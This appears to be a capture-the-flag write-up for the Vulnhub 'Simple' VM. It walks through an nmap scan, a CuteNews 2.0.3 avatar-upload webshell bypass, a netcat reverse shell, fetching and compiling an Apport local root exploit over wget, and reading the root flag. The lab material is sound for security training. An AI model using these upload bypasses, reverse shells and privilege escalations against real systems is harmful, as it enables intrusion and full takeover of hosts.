BNE0x03 - Simple Writeup

This time, we are doing bull's vm Simple.

First things first, we nmap the host

[email protected]:~# nmap -A -T4 -sV -p- -v

Starting Nmap 7.12 ( ) at 2016-05-09 14:44 EEST
NSE: Loaded 138 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:44
Completed NSE at 14:44, 0.00s elapsed
Initiating NSE at 14:44
Completed NSE at 14:44, 0.00s elapsed
Initiating ARP Ping Scan at 14:44
Scanning [1 port]
Completed ARP Ping Scan at 14:44, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:44
Completed Parallel DNS resolution of 1 host. at 14:44, 0.00s elapsed
Initiating SYN Stealth Scan at 14:44
Scanning simple.lan ( [65535 ports]
Discovered open port 80/tcp on
Completed SYN Stealth Scan at 14:44, 17.69s elapsed (65535 total ports)
Initiating Service scan at 14:44
Scanning 1 service on simple.lan (
Completed Service scan at 14:44, 6.03s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against simple.lan (
NSE: Script scanning
Initiating NSE at 14:44
Completed NSE at 14:44, 0.36s elapsed
Initiating NSE at 14:44
Completed NSE at 14:44, 0.00s elapsed
Nmap scan report for simple.lan (
Host is up (0.0023s latency).
Not shown: 65534 closed ports
80/tcp open  http    Apache httpd 2.4.7
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Index of /
MAC Address: 08:00:27:60:21:5C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Uptime guess: 0.182 days (since Mon May  9 10:23:09 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host:

1   2.33 ms simple.lan (

NSE: Script Post-scanning.
Initiating NSE at 14:44
Completed NSE at 14:44, 0.00s elapsed
Initiating NSE at 14:44
Completed NSE at 14:44, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 28.97 seconds
           Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)

We only got port 80 open so let's see what's on that.

CuteNews v.2.0.3. We look for any vulnerabilities regarding that specific app on exploit db.
There is indeed an  Arbitrary File Upload Vulnerability.

First, we register for a new user

Then, at the Personal Options page we need to change the avatar with our webshell. we select a php file with extension .jpg and edit the post parameter of the file name and change it from .jpg to .php, after it has been submitted to bypass user-side file security.

Upon submitting the edited post request, the notification says that the changes to the avatar have been made.

After the shell has been uploaded, we just need to navigate to uploads/avatar_<username>_<file> in my case uploads/avatar_gknsb_shell.php.

Time for local privilege escalation. I start enumerating the system through b374k webshell.

/var/www/>uname -a
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 i686 i686 GNU/Linux

/var/www/>cat /etc/lsb-release

After some search, and a few failed attempts with overlayfs exploits, in exploit-db I come accross this Apport Local Root exploit.

For an exploit to elevate our privileges we need to escape the webshell and get a reverse shell instead. In b374k, I navigate to the Network tab and establish a reverse shell like so.

Before hitting the "run" button, I have started a netcat listener locally on port 443 so since the reverse shell is established let's go through with the escalation.

[email protected]:~# nc -lvv -p 443
listening on [any] 443 ...
connect to [] from simple.lan [] 54344
b374k shell : connected
/bin/sh: 0: can't access tty; job control turned off
--2016-05-09 08:31:57--
Resolving (
Connecting to (||:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5216 (5.1K) [application/txt]
Saving to: '36746'

     0K .....                                                 100%  155M=0s

2016-05-09 08:31:58 (155 MB/s) - '36746' saved [5216/5216]

/tmp>mv 36746 exploit.c
/tmp>gcc -o sploit exploit.c -static
exploit.c:17:3: warning: #warning this file must be compiled with -static [-Wcpp]
 # warning this file must be compiled with -static
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)

At this point our job is almost done. What is left is to spawn an interactive shell, and go grab the flag.

uid=0(root) gid=33(www-data) groups=0(root),33(www-data)
python -c 'import pty; pty.spawn("/bin/bash")'
[email protected]:/tmp# cd /root/  
cd /root/
[email protected]:/root# ls -l
ls -l
total 4
-rw------- 1 root root 52 Sep 21  2015 flag.txt
[email protected]:/root# cat flag.txt
cat flag.txt
U wyn teh Interwebs!!1eleven11!!1!
Hack the planet!
[email protected]:/root#

That's it. Thanks a lot to RobertWinkel for creating the vm and Vulnhub for hosting it. Cheers!